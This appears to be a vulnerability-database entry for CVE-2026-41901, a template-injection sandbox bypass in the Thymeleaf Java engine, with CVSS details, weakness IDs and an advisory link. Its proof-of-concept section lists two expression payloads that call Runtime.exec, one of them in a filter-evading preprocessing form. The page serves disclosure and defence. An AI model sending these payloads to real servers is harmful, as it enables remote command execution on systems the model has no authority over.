Security Vulnerability Report
CVE-2026-41901 CVSS 9.0 CRITICAL

CVE-2026-41901

Published: 2026-05-12 23:16:17
Last Modified: 2026-05-13 16:10:58

Description

Thymeleaf is a server-side Java template engine for web and standalone environments. Prior to 3.1.5.RELEASE, a security bypass vulnerability exists in the expression execution mechanisms of Thymeleaf. Although the library provides mechanisms to avoid the execution of potentially dangerous expressions in some specific sandboxed (restricted) contexts, it fails to properly neutralize specific constructs that allow these kinds of expressions to be executed. If an application developer passes unsanitized variables that contain such expressions to the template engine, and these values are used in sandboxed contexts inside the templates, the expressions can be executed, achieving Server-Side Template Injection (SSTI). This vulnerability is fixed in 3.1.5.RELEASE.

CVSS Details

CVSS Score
9.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Thymeleaf < 3.1.5.RELEASE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
text
<!-- PoC Concept for Thymeleaf SSTI Sandbox Bypass
     Target: Thymeleaf < 3.1.5.RELEASE
     Context: User controlled input reflected in a sandboxed template expression. -->

// Payload 1: Direct execution attempt (depending on sandbox strictness)
${T(java.lang.Runtime).getRuntime().exec('calc.exe')}

// Payload 2: Using preprocessing/bypass techniques often found in template engines
// This attempts to obfuscate the execution flow to bypass basic filters.
__${T(java.lang.Runtime).getRuntime().exec('touch /tmp/pwned')}__::.x

References

https://github.com/thymeleaf/thymeleaf/security/advisories/GHSA-c9ph-gxww-7744

Weaknesses

CWE-917 (Improper Neutralization of Special Elements used in an Expression Language Statement)
CWE-1336 (Improper Neutralization of Special Elements Used in a Template Engine)
